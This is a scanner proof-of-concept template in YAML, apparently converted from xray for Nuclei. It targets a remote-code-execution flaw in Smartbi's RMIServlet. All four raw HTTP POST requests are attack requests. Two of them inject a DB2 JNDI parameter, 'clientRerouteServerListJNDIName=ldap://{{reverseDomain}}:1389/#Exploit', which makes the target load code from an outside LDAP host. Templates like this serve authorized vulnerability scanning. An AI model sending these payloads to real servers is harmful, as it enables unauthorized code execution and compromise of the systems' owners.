id: poc-yaml-smartbi-db2-biconfigservice-rce

info:
  name: poc-yaml-smartbi-db2-biconfigservice-rce
  author: secking
  severity: critical
  tags: xray-converted,rce,ct-529855
  reference:
    - https://www.smartbi.com.cn/patchinfo

http:
  - raw:
      - |
        POST /smartbi/vision/RMIServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688",":clientRerouteServerListJNDIName=","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        POST /smartbi/vision/RMIServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688","BLUDB:clientRerouteServerListJNDIName=ldap://{{reverseDomain}}:1389/#Exploit","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        POST /vision/RMIServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688",":clientRerouteServerListJNDIName=","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        POST /vision/RMIServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688","BLUDB:clientRerouteServerListJNDIName=ldap://{{reverseDomain}}:1389/#Exploit","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200